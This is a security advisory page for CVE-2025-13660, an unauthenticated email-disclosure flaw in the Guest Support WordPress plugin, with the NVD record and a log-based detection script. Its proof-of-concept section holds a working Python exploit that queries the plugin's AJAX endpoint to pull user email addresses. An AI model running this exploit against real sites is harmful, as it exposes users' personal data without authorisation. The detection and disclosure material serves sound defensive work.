Security Vulnerability Report
CVE-2025-13660 CVSS 5.3 MEDIUM

CVE-2025-13660

Published: 2025-12-12 07:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Guest Support plugin for WordPress is vulnerable to User Email Disclosure in versions up to, and including, 1.2.3. This is due to the plugin exposing a public AJAX endpoint that allows anyone to search for and retrieve user email addresses without any authentication or capability checks. This makes it possible for unauthenticated attackers to enumerate user accounts and extract email addresses via the guest_support_handler=ajax endpoint with the request=get_users parameter.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry.

Affected product: WordPress Guest Support plugin <= 1.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-13660 PoC - WordPress Guest Support Plugin User Email Disclosure
# Target: WordPress site with Guest Support plugin <= 1.2.3


def exploit_guest_support_email_disclosure(target_url):
    """
    Exploit for CVE-2025-13660

    This PoC demonstrates how an unauthenticated attacker can retrieve
    user email addresses from WordPress sites running the Guest Support plugin.
    """
    # Target the AJAX endpoint. Routing the request through admin-ajax.php with
    # action=guest_support_handler is this PoC's choice; the advisory itself only
    # names the guest_support_handler=ajax / request=get_users parameter pair.
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Payload to request user emails
    data = {
        "action": "guest_support_handler",
        "guest_support_handler": "ajax",
        "request": "get_users",
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {endpoint}")
    print("[*] Sending unauthenticated request...")

    try:
        # Send the request with no session cookie and no nonce
        response = requests.post(endpoint, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Request failed with status code: {response.status_code}")
        return None

    print("[+] Request successful!")
    print("[+] Response content:")
    print(response.text)

    # admin-ajax.php answers with a bare "0" (not JSON) when no handler claims the
    # action, so fall back to the raw body instead of crashing on a decode error.
    try:
        return response.json()
    except ValueError:
        return response.text


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
    exploit_guest_support_email_disclosure(target)

# Usage: python cve-2025-13660.py http://vulnerable-site.com
# Note: This PoC is for authorized security testing only
```
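The defensive counterpart to the PoC above, added here as an example that is not part of the advisory, the Wordfence write-up or the Guest Support plugin: a small detection script that flags requests carrying the guest_support_handler=ajax and request=get_users pair named in the description. It reads two constructed sources, Apache/nginx combined-format access-log lines and WAF-style JSON request events. The split matters because a plain access log records only the GET query string; a POST probe like the one in the PoC (body parameters, no query string) is invisible there and only shows up in a log that captures the request body. The JSON event shape, the cookie field and every log line are assumptions made up for this example; the one WordPress-specific heuristic is the `wordpress_logged_in_` cookie prefix used to mark a request as coming from a logged-in session, which helps triage even though the vulnerable handler performs no capability check at all.

```python
"""Detection helper for CVE-2025-13660 style probes (added example, not plugin code)."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample access-log lines (not real traffic). 203.0.113.10 probes the
# endpoint twice; the other lines are noise, including a request that carries
# request=get_users without the guest_support_handler key and must not match.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [12/Dec/2025:08:01:02 +0000] "GET /?guest_support_handler=ajax&request=get_users HTTP/1.1" 200 1834 "-" "python-requests/2.32.3"',
    '203.0.113.10 - - [12/Dec/2025:08:01:03 +0000] "GET /index.php?request=get_users&guest_support_handler=ajax HTTP/1.1" 200 1834 "-" "python-requests/2.32.3"',
    '198.51.100.7 - - [12/Dec/2025:08:02:10 +0000] "GET /wp-login.php HTTP/1.1" 200 5112 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2025:08:02:15 +0000] "GET /api/?request=get_users HTTP/1.1" 404 312 "-" "Mozilla/5.0"',
    'not a log line at all',
]

# Constructed WAF-style JSON events (assumed schema) that also carry the request
# body and Cookie header, which is where POST probes and session state are visible.
SAMPLE_WAF_EVENTS = [
    json.dumps({"ts": "2025-12-12T08:03:00Z", "client_ip": "203.0.113.10", "method": "POST",
                "uri": "/wp-admin/admin-ajax.php", "status": 200, "cookie": "",
                "body": "action=guest_support_handler&guest_support_handler=ajax&request=get_users"}),
    json.dumps({"ts": "2025-12-12T08:03:05Z", "client_ip": "198.51.100.7", "method": "POST",
                "uri": "/wp-admin/admin-ajax.php", "status": 200,
                "cookie": "wordpress_logged_in_0123abcd=editor|1765500000|x|y", "body": "action=heartbeat"}),
    json.dumps({"ts": "2025-12-12T08:04:00Z", "client_ip": "198.51.100.7", "method": "GET",
                "uri": "/?guest_support_handler=ajax&request=get_users", "status": 200,
                "cookie": "wordpress_logged_in_0123abcd=editor|1765500000|x|y", "body": ""}),
]


def matches_cve_2025_13660(method, target, body=""):
    """True when the query string (or, for POST, the form body as well) carries both
    guest_support_handler=ajax and request=get_users, the pair named in the advisory."""
    params = parse_qs(urlsplit(target).query)
    if method.upper() == "POST" and body:
        for key, values in parse_qs(body).items():
            params.setdefault(key, []).extend(values)
    return "ajax" in params.get("guest_support_handler", []) and "get_users" in params.get("request", [])


def parse_access_log_line(line):
    """Return the named fields of a combined-format line, or None for unparseable input."""
    m = COMBINED_LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_access_log(lines):
    """Access logs carry no body and no session state, so authenticated is unknown (None)."""
    hits = []
    for line in lines:
        rec = parse_access_log_line(line)
        if rec and matches_cve_2025_13660(rec["method"], rec["target"]):
            hits.append({"source": "access_log", "ip": rec["ip"], "ts": rec["ts"],
                         "status": int(rec["status"]), "authenticated": None})
    return hits


def detect_waf_events(lines):
    """WAF events include body and cookies; a wordpress_logged_in_* cookie marks a session."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if matches_cve_2025_13660(ev["method"], ev["uri"], ev.get("body", "")):
            hits.append({"source": "waf", "ip": ev["client_ip"], "ts": ev["ts"],
                         "status": int(ev["status"]),
                         "authenticated": "wordpress_logged_in_" in ev.get("cookie", "")})
    return hits


def summarize(hits):
    """Counts for triage: total hits, hits per source IP, how many were served with 200
    (i.e. likely returned data), and how many came from clients with no session cookie."""
    by_ip = {}
    for h in hits:
        by_ip[h["ip"]] = by_ip.get(h["ip"], 0) + 1
    return {
        "total": len(hits),
        "by_ip": by_ip,
        "served_200": sum(1 for h in hits if h["status"] == 200),
        "unauthenticated": sum(1 for h in hits if h["authenticated"] is False),
        "auth_unknown": sum(1 for h in hits if h["authenticated"] is None),
    }


if __name__ == "__main__":
    all_hits = detect_access_log(SAMPLE_ACCESS_LOG) + detect_waf_events(SAMPLE_WAF_EVENTS)
    for hit in all_hits:
        print(hit)
    print(summarize(all_hits))
```

The match requires both parameters, so a stray request=get_users on an unrelated path does not fire; a hit served with status 200 from a client with no login cookie is the case to treat as a probable disclosure, while hits with a session cookie still deserve a look because the handler never checked capabilities in the first place.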

References

https://plugins.trac.wordpress.org/browser/guest-support/tags/1.2.3/includes/library/ajax.php#L22 (includes/library/ajax.php in the affected 1.2.3 release)
https://plugins.trac.wordpress.org/browser/guest-support/trunk/includes/library/ajax.php#L22 (same file in trunk)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412822%40guest-support&new=3412822%40guest-support&sfp_email=&sfph_mail= (plugin changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/01299aba-0dff-47fd-9e90-ee84f00a0f3b?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13660",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T07:15:44.373",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Guest Support plugin for WordPress is vulnerable to User Email Disclosure in versions up to, and including, 1.2.3. This is due to the plugin exposing a public AJAX endpoint that allows anyone to search for and retrieve user email addresses without any authentication or capability checks. This makes it possible for unauthenticated attackers to enumerate user accounts and extract email addresses via the guest_support_handler=ajax endpoint with the request=get_users parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/guest-support/tags/1.2.3/includes/library/ajax.php#L22",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/guest-support/trunk/includes/library/ajax.php#L22",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412822%40guest-support&new=3412822%40guest-support&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/01299aba-0dff-47fd-9e90-ee84f00a0f3b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```